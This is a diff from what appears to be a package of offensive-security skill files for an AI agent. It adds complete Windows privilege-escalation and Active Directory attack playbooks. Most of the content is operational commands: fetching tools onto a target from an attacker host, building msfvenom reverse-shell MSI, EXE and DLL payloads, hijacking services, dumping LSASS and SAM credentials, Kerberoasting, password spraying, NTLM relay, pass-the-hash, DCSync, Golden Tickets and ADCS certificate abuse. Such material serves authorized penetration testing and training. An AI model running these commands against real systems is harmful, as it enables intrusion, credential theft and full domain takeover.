  284. package/skills/offensive/airecon-fork/reconnaissance-asn-whois-osint/SKILL.md +236 -0
  285. package/skills/offensive/airecon-fork/reconnaissance-ctf-methodology/SKILL.md +435 -0
  286. package/skills/offensive/airecon-fork/reconnaissance-dorking/SKILL.md +182 -0
  287. package/skills/offensive/airecon-fork/reconnaissance-exposed-devtools-detection/SKILL.md +513 -0
  288. package/skills/offensive/airecon-fork/reconnaissance-full-recon/SKILL.md +305 -0
  289. package/skills/offensive/airecon-fork/reconnaissance-internal-pentest/SKILL.md +202 -0
  290. package/skills/offensive/airecon-fork/reconnaissance-javascript-analysis/SKILL.md +167 -0
  291. package/skills/offensive/airecon-fork/reconnaissance-js-internal-hostname-intelligence/SKILL.md +391 -0
  292. package/skills/offensive/airecon-fork/reconnaissance-monitoring-secrets-exposure/SKILL.md +394 -0
  293. package/skills/offensive/airecon-fork/reconnaissance-shodan-censys/SKILL.md +279 -0
  294. package/skills/offensive/airecon-fork/reconnaissance-subdomain-enum/SKILL.md +952 -0
  295. package/skills/offensive/airecon-fork/technologies-cicd-attacks/SKILL.md +283 -0
  296. package/skills/offensive/airecon-fork/technologies-cloud-security/SKILL.md +299 -0
  297. package/skills/offensive/airecon-fork/technologies-docker-container/SKILL.md +266 -0
  298. package/skills/offensive/airecon-fork/technologies-elasticsearch/SKILL.md +226 -0
  299. package/skills/offensive/airecon-fork/technologies-firebase-firestore/SKILL.md +213 -0
  300. package/skills/offensive/airecon-fork/technologies-frida-hooking/SKILL.md +387 -0
  301. package/skills/offensive/airecon-fork/technologies-gitlab-github/SKILL.md +259 -0
  302. package/skills/offensive/airecon-fork/technologies-jenkins/SKILL.md +256 -0
  303. package/skills/offensive/airecon-fork/technologies-kubernetes-pentest/SKILL.md +281 -0
  304. package/skills/offensive/airecon-fork/technologies-memcached/SKILL.md +230 -0
  305. package/skills/offensive/airecon-fork/technologies-mobile-app-pentesting/SKILL.md +105 -0
  306. package/skills/offensive/airecon-fork/technologies-mongodb/SKILL.md +257 -0
  307. package/skills/offensive/airecon-fork/technologies-nginx-apache/SKILL.md +280 -0
  308. package/skills/offensive/airecon-fork/technologies-observability-stack-attacks/SKILL.md +501 -0
  309. package/skills/offensive/airecon-fork/technologies-redis/SKILL.md +236 -0
  310. package/skills/offensive/airecon-fork/technologies-supabase/SKILL.md +270 -0
  311. package/skills/offensive/airecon-fork/technologies-tomcat/SKILL.md +232 -0
  312. package/skills/offensive/airecon-fork/tools-advanced-fuzzing/SKILL.md +351 -0
  313. package/skills/offensive/airecon-fork/tools-browser-automation/SKILL.md +300 -0
  314. package/skills/offensive/airecon-fork/tools-caido/SKILL.md +776 -0
  315. package/skills/offensive/airecon-fork/tools-code-review/SKILL.md +71 -0
  316. package/skills/offensive/airecon-fork/tools-dalfox/SKILL.md +189 -0
  317. package/skills/offensive/airecon-fork/tools-hashcat-john/SKILL.md +258 -0
  318. package/skills/offensive/airecon-fork/tools-impacket/SKILL.md +227 -0
  319. package/skills/offensive/airecon-fork/tools-install/SKILL.md +202 -0
  320. package/skills/offensive/airecon-fork/tools-metasploit/SKILL.md +270 -0
  321. package/skills/offensive/airecon-fork/tools-nmap/SKILL.md +211 -0
  322. package/skills/offensive/airecon-fork/tools-nuclei/SKILL.md +175 -0
  323. package/skills/offensive/airecon-fork/tools-reporting/SKILL.md +47 -0
  324. package/skills/offensive/airecon-fork/tools-scripting/SKILL.md +1939 -0
  325. package/skills/offensive/airecon-fork/tools-semgrep/SKILL.md +202 -0
  326. package/skills/offensive/airecon-fork/tools-source-audit/SKILL.md +308 -0
  327. package/skills/offensive/airecon-fork/tools-sqlmap/SKILL.md +137 -0
  328. package/skills/offensive/airecon-fork/tools-tool-catalog/SKILL.md +320 -0
  329. package/skills/offensive/airecon-fork/tools-wapiti/SKILL.md +293 -0
  330. package/skills/offensive/airecon-fork/vulnerabilities-2fa-bypass/SKILL.md +219 -0
  331. package/skills/offensive/airecon-fork/vulnerabilities-account-takeover/SKILL.md +223 -0
  332. package/skills/offensive/airecon-fork/vulnerabilities-api-schema-exposure/SKILL.md +849 -0
  333. package/skills/offensive/airecon-fork/vulnerabilities-api-testing/SKILL.md +278 -0
  334. package/skills/offensive/airecon-fork/vulnerabilities-auth-workflow/SKILL.md +252 -0
  335. package/skills/offensive/airecon-fork/vulnerabilities-authentication-jwt/SKILL.md +158 -0
  336. package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md +156 -0
  337. package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md +111 -0
  338. package/skills/offensive/airecon-fork/vulnerabilities-business-logic/SKILL.md +313 -0
  339. package/skills/offensive/airecon-fork/vulnerabilities-cors/SKILL.md +242 -0
  340. package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md +146 -0
  341. package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md +200 -0
  342. package/skills/offensive/airecon-fork/vulnerabilities-csrf-advanced-bypass/SKILL.md +536 -0
  343. package/skills/offensive/airecon-fork/vulnerabilities-deserialization/SKILL.md +363 -0
  344. package/skills/offensive/airecon-fork/vulnerabilities-dom-based-vulnerabilities/SKILL.md +105 -0
  345. package/skills/offensive/airecon-fork/vulnerabilities-exploitation/SKILL.md +286 -0
  346. package/skills/offensive/airecon-fork/vulnerabilities-grpc/SKILL.md +123 -0
  347. package/skills/offensive/airecon-fork/vulnerabilities-host-header-injection/SKILL.md +169 -0
  348. package/skills/offensive/airecon-fork/vulnerabilities-http-smuggling/SKILL.md +411 -0
  349. package/skills/offensive/airecon-fork/vulnerabilities-idor/SKILL.md +705 -0
  350. package/skills/offensive/airecon-fork/vulnerabilities-information-disclosure/SKILL.md +867 -0
  351. package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md +190 -0
  352. package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md +270 -0
  353. package/skills/offensive/airecon-fork/vulnerabilities-kubernetes/SKILL.md +252 -0
  354. package/skills/offensive/airecon-fork/vulnerabilities-mass-assignment/SKILL.md +788 -0
  355. package/skills/offensive/airecon-fork/vulnerabilities-nosql-injection/SKILL.md +204 -0
  356. package/skills/offensive/airecon-fork/vulnerabilities-oauth-misconfig/SKILL.md +220 -0
  357. package/skills/offensive/airecon-fork/vulnerabilities-oauth-saml/SKILL.md +163 -0
  358. package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md +167 -0
  359. package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md +66 -0
  360. package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md +192 -0
  361. package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md +320 -0
  362. package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md +242 -0
  363. package/skills/offensive/airecon-fork/vulnerabilities-race-conditions/SKILL.md +192 -0
  364. package/skills/offensive/airecon-fork/vulnerabilities-rce/SKILL.md +240 -0
  365. package/skills/offensive/airecon-fork/vulnerabilities-sensitive-file-pii-exposure/SKILL.md +589 -0
  366. package/skills/offensive/airecon-fork/vulnerabilities-spring4shell/SKILL.md +86 -0
  367. package/skills/offensive/airecon-fork/vulnerabilities-sql-injection/SKILL.md +313 -0
  368. package/skills/offensive/airecon-fork/vulnerabilities-ssrf/SKILL.md +183 -0
  369. package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md +344 -0
  370. package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md +160 -0
  371. package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md +125 -0
  372. package/skills/offensive/airecon-fork/vulnerabilities-unhandled-exception-differential/SKILL.md +742 -0
  373. package/skills/offensive/airecon-fork/vulnerabilities-waf-detection/SKILL.md +90 -0
  374. package/skills/offensive/airecon-fork/vulnerabilities-web-cache-poisoning/SKILL.md +233 -0
  375. package/skills/offensive/airecon-fork/vulnerabilities-websocket/SKILL.md +180 -0
  376. package/skills/offensive/airecon-fork/vulnerabilities-xss/SKILL.md +316 -0
  377. package/skills/offensive/airecon-fork/vulnerabilities-xxe/SKILL.md +222 -0
  378. package/skills/offensive/matty-fork/cicd-redteam/SKILL.md +531 -0
  379. package/skills/offensive/matty-fork/cloud-security/SKILL.md +106 -0
  380. package/skills/offensive/matty-fork/container-escape/SKILL.md +174 -0
  381. package/skills/offensive/matty-fork/mobile-pentester/SKILL.md +357 -0
  382. package/skills/offensive/matty-fork/subdomain-takeover/SKILL.md +154 -0
  383. package/skills/osint/elementalsouls-fork/offensive-osint/README.md +92 -0
  384. package/skills/osint/elementalsouls-fork/offensive-osint/SKILL.md +4177 -0
  385. package/skills/osint/elementalsouls-fork/osint-methodology/README.md +66 -0
  386. package/skills/osint/elementalsouls-fork/osint-methodology/SKILL.md +1695 -0
@@ -0,0 +1,210 @@
1
+ <!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
2
+
3
+ ---
4
+ name: windows-privesc
5
+ description: Windows privilege escalation — AlwaysInstallElevated, unquoted service paths, weak service permissions, token impersonation, SeImpersonatePrivilege, winpeas, and credential dumping
6
+ ---
7
+
8
+ # Windows Privilege Escalation
9
+
10
+ Goal: low-privilege user → SYSTEM/Administrator. Enumerate first, exploit second.
11
+
12
+ **Tools (transfer to target or use from SMB share):**
13
+ ```
14
+ # WinPEAS: download winpeas.exe to /home/pentester/tools/
15
+ wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe -O /home/pentester/tools/winpeas.exe
16
+ # PowerUp: included in PowerSploit
17
+ # SharpUp: .NET alternative
18
+ # Serve via Python HTTP: python3 -m http.server 8000 --directory /home/pentester/tools/
19
+ ```
20
+
21
+ ---
22
+
23
+ ## Automated Enumeration — Start Here
24
+
25
+ # Transfer and run winpeas:
26
+ # From attacker: python3 -m http.server 8000 --directory /home/pentester/tools/
27
+ # On target (cmd):
28
+ certutil -urlcache -f http://<attacker>:8000/winpeas.exe C:\Temp\winpeas.exe
29
+ C:\Temp\winpeas.exe
30
+
31
+ # PowerShell download:
32
+ (New-Object Net.WebClient).DownloadFile('http://<attacker>:8000/winpeas.exe','C:\Temp\winpeas.exe')
33
+
34
+ # Manual initial checks (cmd):
35
+ whoami /priv # Privileges
36
+ whoami /groups # Group memberships
37
+ net user <username> # User info
38
+ net localgroup administrators # Local admins
39
+
40
+ ---
41
+
42
+ ## Token Impersonation — SeImpersonatePrivilege
43
+
44
+ Most common privesc on Windows services (IIS, SQL Server, etc.):
45
+
46
+ # Check if you have SeImpersonatePrivilege:
47
+ whoami /priv
48
+ # SeImpersonatePrivilege = Enabled → potato attacks work
49
+
50
+ # Potato attacks (escalate to SYSTEM):
51
+
52
+ # PrintSpoofer (Windows 10/2019+):
53
+ # wget https://github.com/itm4n/PrintSpoofer/releases/latest/download/PrintSpoofer64.exe
54
+ PrintSpoofer64.exe -i -c cmd
55
+ PrintSpoofer64.exe -c "powershell -enc <base64_revshell>"
56
+
57
+ # GodPotato (most universal — works on Server 2012-2022):
58
+ # wget https://github.com/BeichenDream/GodPotato/releases/latest/download/GodPotato-NET4.exe
59
+ GodPotato-NET4.exe -cmd "cmd /c whoami"
60
+ GodPotato-NET4.exe -cmd "powershell -enc <base64_revshell>"
61
+
62
+ # JuicyPotato (older Windows, <Server 2019):
63
+ # wget https://github.com/ohpe/juicy-potato/releases/latest/download/JuicyPotato.exe
64
+ JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c powershell -enc <payload>" -t * -c {CLSID}
65
+ # CLSIDs: https://github.com/ohpe/juicy-potato/tree/master/CLSID
66
+
67
+ ---
68
+
69
+ ## AlwaysInstallElevated
70
+
71
+ MSI files install as SYSTEM if this registry key is set:
72
+
73
+ # Check registry:
74
+ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
75
+ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
76
+ # Both must be 1 for exploitation
77
+
78
+ # Create malicious MSI (from attacker Kali):
79
+ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f msi -o priv.msi
80
+
81
+ # Install on target:
82
+ msiexec /quiet /qn /i C:\Temp\priv.msi
83
+
84
+ ---
85
+
86
+ ## Unquoted Service Paths
87
+
88
+ If a service binary path has spaces and no quotes, Windows tries multiple path interpretations:
89
+
90
+ # Find unquoted paths:
91
+ wmic service get name,pathname,displayname,startmode | findstr /i "auto" | findstr /iv "c:\windows\\" | findstr /iv """
92
+ # OR:
93
+ sc qc <service_name> # Check individual service
94
+
95
+ # Example: C:\Program Files\Vulnerable Service\service.exe
96
+ # Windows tries: C:\Program.exe → C:\Program Files\Vulnerable.exe → C:\Program Files\Vulnerable Service\service.exe
97
+ # Place malicious binary at first writable location:
98
+ # Check write permissions:
99
+ icacls "C:\Program Files\Vulnerable Service"
100
+ # If writable: drop service.exe there
101
+ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f exe -o "C:\Program Files\Vulnerable.exe"
102
+ # Restart service:
103
+ sc stop "VulnService" && sc start "VulnService"
104
+
105
+ ---
106
+
107
+ ## Weak Service Permissions
108
+
109
+ # Check service permissions:
110
+ accesschk.exe -wuvc Everyone * # Services writable by Everyone
111
+ accesschk.exe -wuvc "Authenticated Users" *
112
+ # Download accesschk: https://learn.microsoft.com/sysinternals/downloads/accesschk
113
+
114
+ # If service is writable, change its binary path:
115
+ sc config <service_name> binPath= "cmd.exe /c net localgroup administrators <user> /add"
116
+ sc start <service_name>
117
+ # OR: reverse shell:
118
+ sc config <service_name> binPath= "C:\Temp\shell.exe"
119
+ sc start <service_name>
120
+
121
+ ---
122
+
123
+ ## DLL Hijacking
124
+
125
+ Windows searches for DLLs in a specific order — place malicious DLL first:
126
+
127
+ # Find missing DLLs (from Procmon on dev machine, or:)
128
+ # Check applications that run as SYSTEM and load DLLs from writable directories
129
+
130
+ # Create malicious DLL (Kali):
131
+ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f dll -o hijack.dll
132
+
133
+ # Place in application directory if writable, then restart service
134
+
135
+ ---
136
+
137
+ ## Credential Extraction
138
+
139
+ # Dump SAM database (requires SYSTEM/Admin):
140
+ reg save HKLM\SAM C:\Temp\SAM
141
+ reg save HKLM\SYSTEM C:\Temp\SYSTEM
142
+ # Transfer to Kali:
143
+ secretsdump.py LOCAL -sam SAM -system SYSTEM
144
+
145
+ # secretsdump.py remotely (from Kali with admin creds):
146
+ secretsdump.py administrator:password@<target>
147
+ secretsdump.py -hashes :<NTLM> administrator@<target>
148
+
149
+ # LSASS memory dump (requires SeDebugPrivilege / Admin):
150
+ # Method 1: Task Manager → lsass.exe → Create dump file
151
+ # Method 2: Via cmd:
152
+ procdump64.exe -ma lsass.exe lsass.dmp
153
+ # Method 3: comsvcs.dll (no tools needed):
154
+ rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass_PID> C:\Temp\lsass.dmp full
155
+ # Transfer to Kali and parse:
156
+ pypykatz lsa minidump lsass.dmp
157
+ # pip install pypykatz --break-system-packages
158
+
159
+ ---
160
+
161
+ ## Scheduled Tasks
162
+
163
+ # List all scheduled tasks:
164
+ schtasks /query /fo LIST /v | findstr /i "task name\|run as\|task to run"
165
+ # Look for: tasks running as SYSTEM with writable binary paths
166
+
167
+ # Modify task binary (if writable):
168
+ schtasks /change /tn "<task_name>" /ru SYSTEM /tr "C:\Temp\shell.exe"
169
+
170
+ ---
171
+
172
+ ## Stored Credentials
173
+
174
+ # Windows Credential Manager:
175
+ cmdkey /list
176
+ runas /savecred /user:administrator cmd.exe # If saved creds exist
177
+
178
+ # Unattend.xml (sometimes contains plaintext passwords):
179
+ type C:\Windows\Panther\Unattend.xml
180
+ type C:\Windows\Panther\Unattend\Unattend.xml
181
+ type C:\Windows\System32\sysprep\sysprep.xml
182
+
183
+ # PowerShell history:
184
+ type C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
185
+
186
+ # Registry saved credentials:
187
+ reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
188
+ # Look for: AutoAdminLogon, DefaultUserName, DefaultPassword
189
+
190
+ ---
191
+
192
+ ## Pro Tips
193
+
194
+ 1. SeImpersonatePrivilege = almost guaranteed SYSTEM via GodPotato (works on most modern Windows)
195
+ 2. `whoami /priv` first — enabled privileges determine available attack paths
196
+ 3. AlwaysInstallElevated = two registry keys must both be 1 — check BOTH HKLM and HKCU
197
+ 4. Unquoted service paths need a writable directory in the path — check `icacls` on each directory
198
+ 5. `secretsdump.py` remotely = no tools needed on target, extract all NTLM hashes from Kali
199
+ 6. PowerShell history often contains passwords typed as arguments — always check
200
+
201
+ ## Summary
202
+
203
+ Windows privesc checklist:
204
+ 1. `whoami /priv` → SeImpersonatePrivilege → GodPotato/PrintSpoofer
205
+ 2. `winpeas.exe` → automated full enumeration
206
+ 3. AlwaysInstallElevated → malicious MSI
207
+ 4. Unquoted service paths → drop binary
208
+ 5. Weak service permissions → `accesschk` → `sc config binPath`
209
+ 6. `secretsdump.py` → dump all NTLM hashes
210
+ 7. Stored credentials in registry, Unattend.xml, PS history
@@ -0,0 +1,314 @@
1
+ <!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
2
+
3
+ ---
4
+ name: active-directory
5
+ description: Active Directory attack techniques covering enumeration, Kerberoasting, AS-REP Roasting, Pass-the-Hash, DCSync, ADCS ESC attacks, and ACL abuse
6
+ ---
7
+
8
+ # Active Directory Attacks
9
+
10
+ AD is the most common enterprise authentication backbone. Compromise follows a pattern: enumerate → credential attack → lateral movement → domain escalation. Most paths lead to DCSync or a Golden Ticket.
11
+
12
+ ---
13
+
14
+ ## Enumeration (Unauthenticated)
15
+
16
+ ### Network Discovery
17
+
18
+ # Find DCs
19
+ nmap -p 88,389,445,636,3268,3269 <subnet> --open -oA output/ad_scan
20
+ nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>
21
+
22
+ # LDAP anonymous query
23
+ ldapsearch -H ldap://<dc_ip> -x -s base namingcontexts
24
+ ldapsearch -H ldap://<dc_ip> -x -b "dc=domain,dc=com" -s sub "(objectclass=*)"
25
+
26
+ # SMB null session
27
+ smbclient -L //<dc_ip> -N
28
+ enum4linux-ng -A <dc_ip>
29
+ netexec smb <subnet>/24 --gen-relay-list output/relay_targets.txt
30
+
31
+ ---
32
+
33
+ ## Enumeration (Authenticated)
34
+
35
+ ### BloodHound
36
+
37
+ # SharpHound collector (Windows)
38
+ .\SharpHound.exe -c All --zipfilename output.zip
39
+
40
+ # BloodHound.py (Linux — remote collection)
41
+ bloodhound-python -u <user> -p <pass> -d <domain> -ns <dc_ip> -c All
42
+ # Or with NTLM hash:
43
+ bloodhound-python -u <user> --hashes :<ntlm_hash> -d <domain> -ns <dc_ip> -c All
44
+
45
+ # Import JSON to BloodHound and look for:
46
+ # - Shortest path to Domain Admin
47
+ # - Users with DCSync rights
48
+ # - Kerberoastable users
49
+ # - AS-REP Roastable users
50
+
51
+ ### PowerView / ldapsearch Queries
52
+
53
+ # Users and groups
54
+ Get-DomainUser | select name,description,memberof,lastlogon
55
+ Get-DomainGroup -Identity "Domain Admins" | select member
56
+ Get-DomainGroupMember "Domain Admins"
57
+
58
+ # Kerberoastable accounts (SPN set)
59
+ Get-DomainUser -SPN | select name,serviceprincipalname
60
+ ldapsearch -H ldap://<dc> -D "<user>@<domain>" -w <pass> -b "dc=domain,dc=com" \
61
+ "(&(objectCategory=user)(servicePrincipalName=*))" sAMAccountName servicePrincipalName
62
+
63
+ # AS-REP Roastable (no preauth required)
64
+ Get-DomainUser -PreauthNotRequired | select name
65
+ ldapsearch -H ldap://<dc> -b "dc=domain,dc=com" \
66
+ "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName
67
+
68
+ # Password policy (lockout threshold)
69
+ Get-DomainPolicy | select -ExpandProperty SystemAccess
70
+
71
+ ---
72
+
73
+ ## Credential Attacks
74
+
75
+ ### Kerberoasting
76
+
77
+ Request service tickets for SPN accounts → offline crack:
78
+
79
+ # impacket (Linux)
80
+ impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <dc_ip> -request -outputfile output/kerberoast.txt
81
+
82
+ # Rubeus (Windows)
83
+ .\Rubeus.exe kerberoast /outfile:kerberoast.txt
84
+
85
+ # Crack with hashcat
86
+ hashcat -m 13100 output/kerberoast.txt /usr/share/wordlists/rockyou.txt --force
87
+
88
+ ### AS-REP Roasting
89
+
90
+ No pre-auth = get encrypted TGT without credentials:
91
+
92
+ # impacket (no credentials needed)
93
+ impacket-GetNPUsers <domain>/ -usersfile output/users.txt -dc-ip <dc_ip> -no-pass -format hashcat \
94
+ -outputfile output/asrep.txt
95
+
96
+ # With credentials (enumerate no-preauth users automatically)
97
+ impacket-GetNPUsers <domain>/<user>:<pass> -dc-ip <dc_ip> -request -format hashcat
98
+
99
+ # Crack
100
+ hashcat -m 18200 output/asrep.txt /usr/share/wordlists/rockyou.txt
101
+
102
+ ### Password Spraying
103
+
104
+ # netexec (formerly CrackMapExec)
105
+ netexec smb <dc_ip> -u output/users.txt -p 'Password123!' --continue-on-success
106
+ netexec smb <dc_ip> -u output/users.txt -p output/passwords.txt --no-brute
107
+
108
+ # Kerbrute (Kerberos-based, no lockout indicator difference)
109
+ kerbrute passwordspray -d <domain> --dc <dc_ip> output/users.txt 'Password123!'
110
+
111
+ ### LLMNR/NBT-NS Poisoning (Responder)
112
+
113
+ # Capture NTLMv2 hashes from broadcast traffic
114
+ responder -I eth0 -wv
115
+
116
+ # Relay captured hashes (no SMB signing)
117
+ netexec smb output/relay_targets.txt --gen-relay-list output/nosign.txt
118
+ impacket-ntlmrelayx -tf output/nosign.txt -smb2support -socks
119
+
120
+ # Crack captured NTLMv2:
121
+ hashcat -m 5600 output/captured.txt /usr/share/wordlists/rockyou.txt
122
+
123
+ ---
124
+
125
+ ## Lateral Movement
126
+
127
+ ### Pass-the-Hash
128
+
129
+ # impacket suite
130
+ impacket-psexec <domain>/<user>@<target_ip> -hashes :<ntlm_hash>
131
+ impacket-wmiexec <domain>/<user>@<target_ip> -hashes :<ntlm_hash>
132
+ impacket-smbexec <domain>/<user>@<target_ip> -hashes :<ntlm_hash>
133
+
134
+ # netexec
135
+ netexec smb <target_ip> -u <user> -H <ntlm_hash> -x "whoami"
136
+
137
+ ### Pass-the-Ticket
138
+
139
+ # Rubeus — extract and inject TGT
140
+ .\Rubeus.exe triage
141
+ .\Rubeus.exe dump /luid:<luid> /nowrap
142
+ .\Rubeus.exe ptt /ticket:<base64_ticket>
143
+
144
+ # impacket — use .ccache file
145
+ export KRB5CCNAME=ticket.ccache
146
+ impacket-psexec <user>@<target> -k -no-pass
147
+
148
+ ### Overpass-the-Hash (NTLM → Kerberos TGT)
149
+
150
+ # Rubeus
151
+ .\Rubeus.exe asktgt /user:<user> /rc4:<ntlm_hash> /ptt
152
+
153
+ # impacket
154
+ impacket-getTGT <domain>/<user> -hashes :<ntlm_hash>
155
+ export KRB5CCNAME=<user>.ccache
156
+ impacket-psexec <user>@<dc> -k -no-pass
157
+
158
+ ---
159
+
160
+ ## Domain Escalation
161
+
162
+ ### DCSync (requires Domain Replication rights)
163
+
164
+ Mimics domain controller replication to extract all password hashes:
165
+
166
+ # impacket (Linux)
167
+ impacket-secretsdump <domain>/<user>:<pass>@<dc_ip> -just-dc
168
+ impacket-secretsdump <domain>/<user>@<dc_ip> -hashes :<ntlm_hash> -just-dc-user Administrator
169
+
170
+ # Mimikatz (Windows)
171
+ lsadump::dcsync /domain:<domain> /user:krbtgt
172
+ lsadump::dcsync /domain:<domain> /all /csv
173
+
174
+ ### Golden Ticket
175
+
176
+ With krbtgt hash, forge TGT for any user/group:
177
+
178
+ # Get krbtgt hash via DCSync first:
179
+ impacket-secretsdump <domain>/Administrator@<dc_ip> -just-dc-user krbtgt
180
+
181
+ # Forge Golden Ticket (Mimikatz)
182
+ kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> \
183
+ /krbtgt:<krbtgt_hash> /ptt
184
+
185
+ # impacket
186
+ impacket-ticketer -nthash <krbtgt_hash> -domain-sid <sid> -domain <domain> Administrator
187
+ export KRB5CCNAME=Administrator.ccache
188
+ impacket-psexec Administrator@<dc> -k -no-pass
189
+
190
+ ### Silver Ticket
191
+
192
+ Forge service ticket for specific service using service account's hash:
193
+
194
+ impacket-ticketer -nthash <service_hash> -domain-sid <sid> -domain <domain> \
195
+ -spn cifs/<target_host> -user-id 500 Administrator
196
+
197
+ ### ACL Abuse
198
+
199
+ BloodHound reveals ACL edges. Key abusable permissions:
200
+
201
+ # WriteDACL over a user → give yourself GenericAll
202
+ Add-DomainObjectAcl -TargetIdentity <target_user> -PrincipalIdentity <your_user> -Rights All
203
+
204
+ # GenericAll over a user → reset password
205
+ Set-DomainUserPassword -Identity <target_user> -AccountPassword (ConvertTo-SecureString "NewPass123!" -AsPlainText -Force)
206
+
207
+ # GenericAll over a group → add yourself
208
+ Add-DomainGroupMember -Identity "Domain Admins" -Members <your_user>
209
+
210
+ # WriteOwner → change ownership → WriteDACL → GenericAll
211
+ Set-DomainObjectOwner -Identity <target> -OwnerIdentity <your_user>
212
+
213
+ ---
214
+
215
+ ## ADCS (Active Directory Certificate Services)
216
+
217
+ Check if ADCS is deployed:
218
+
219
+ certutil -config - -ping
220
+ netexec ldap <dc_ip> -u <user> -p <pass> -M adcs
221
+
222
+ ### ESC1 — SAN Injection
223
+
224
+ Enrollment allows specifying Subject Alternative Name → request cert as any user:
225
+
226
+ # Find vulnerable templates
227
+ certipy find -u <user>@<domain> -p <pass> -dc-ip <dc_ip> -vulnerable
228
+
229
+ # Exploit ESC1
230
+ certipy req -u <user>@<domain> -p <pass> -ca <CA_name> -template <template_name> \
231
+ -upn administrator@<domain> -dc-ip <dc_ip>
232
+
233
+ # Authenticate with certificate
234
+ certipy auth -pfx administrator.pfx -dc-ip <dc_ip>
235
+
236
+ ### ESC2 — Any Purpose EKU
237
+
238
+ Same as ESC1 but template has "Any Purpose" or no EKU.
239
+
240
+ ### ESC4 — Vulnerable Certificate Template ACL
241
+
242
+ # Template with WriteDACL → modify template to ESC1
243
+ certipy template -u <user>@<domain> -p <pass> -template <template> -save-old -dc-ip <dc_ip>
244
+ # Modify template to allow SAN, then exploit as ESC1
245
+
246
+ ### ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2
247
+
248
+ CA flag allows SAN on any template:
249
+
250
+ certipy req -u <user>@<domain> -p <pass> -ca <CA> -template User \
251
+ -upn administrator@<domain>
252
+
253
+ ### ESC8 — AD CS Web Enrollment NTLM Relay
254
+
255
+ # Relay to HTTP enrollment endpoint
256
+ impacket-ntlmrelayx -t http://<CA_server>/certsrv/certfnsh.asp \
257
+ --adcs --template DomainController
258
+
259
+ # Use obtained certificate for DCSync or PtT
260
+
261
+ ---
262
+
263
+ ## Credential Extraction (Post-Compromise)
264
+
265
+ # Mimikatz in memory
266
+ .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
267
+
268
+ # LSASS dump (remote)
269
+ impacket-lsadump <domain>/<user>:<pass>@<target>
270
+
271
+ # SAM/SYSTEM registry dump
272
+ impacket-secretsdump <domain>/<user>:<pass>@<target>
273
+
274
+ # NTDS.dit extraction (DC)
275
+ impacket-secretsdump <domain>/<user>:<pass>@<dc_ip> -just-dc
276
+
277
+ ---
278
+
279
+ ## Key Tools
280
+
281
+ BloodHound: bloodhound-python (collection) + BloodHound CE (visualization)
282
+ Impacket: GetUserSPNs, GetNPUsers, secretsdump, psexec, ntlmrelayx, ticketer
283
+ Certipy: certipy find / req / auth / template / shadow
284
+ netexec: smb/ldap/winrm enum, PTH, spray, modules
285
+ Rubeus: kerberoast, asreproast, triage, dump, ptt, asktgt
286
+ Responder: LLMNR/NBT-NS poisoning, hash capture
287
+ Mimikatz: logonpasswords, dcsync, golden/silver ticket, ptt
288
+ Kerbrute: user enum, password spray over Kerberos
289
+
290
+ ---
291
+
292
+ ## Attack Chain (Quick Reference)
293
+
294
+ Unauthenticated → LLMNR poisoning (Responder) → NTLMv2 hash → crack → valid creds
295
+ Valid creds → Kerberoast high-priv SPNs → crack → service account creds
296
+ Valid creds → BloodHound → ACL path to DA → abuse WriteDACL/GenericAll → DA
297
+ Valid creds → ADCS ESC1 → cert as Admin → DCSync → domain hashes → Golden Ticket
298
+ DA creds → DCSync → krbtgt hash → Golden Ticket → persistent domain control
299
+
300
+ ---
301
+
302
+ ## Pro Tips
303
+
304
+ 1. Always run BloodHound first — shortest path queries reveal non-obvious attack paths
305
+ 2. Kerberoasting is noisy; target only high-value SPNs (SQL admin, web service, backup)
306
+ 3. AS-REP roasting is zero-credential — always check even before getting credentials
307
+ 4. ADCS ESC1/ESC8 are extremely common and often overlooked — certipy find before anything else
308
+ 5. ACL abuse chains (WriteDACL → GenericAll → password reset) leave fewer logs than DCSync
309
+ 6. Don't spray passwords — check the password policy first to avoid lockouts
310
+ 7. SMB signing must be off for relay attacks — netexec gen-relay-list first
311
+
312
+ ## Summary
313
+
314
+ AD compromise = credential collection + path finding (BloodHound) + privilege escalation chain. The end goal is DCSync (domain hash dump) or ADCS Golden Cert for persistent access. ADCS is the most underutilized attack path and often the fastest route to DA.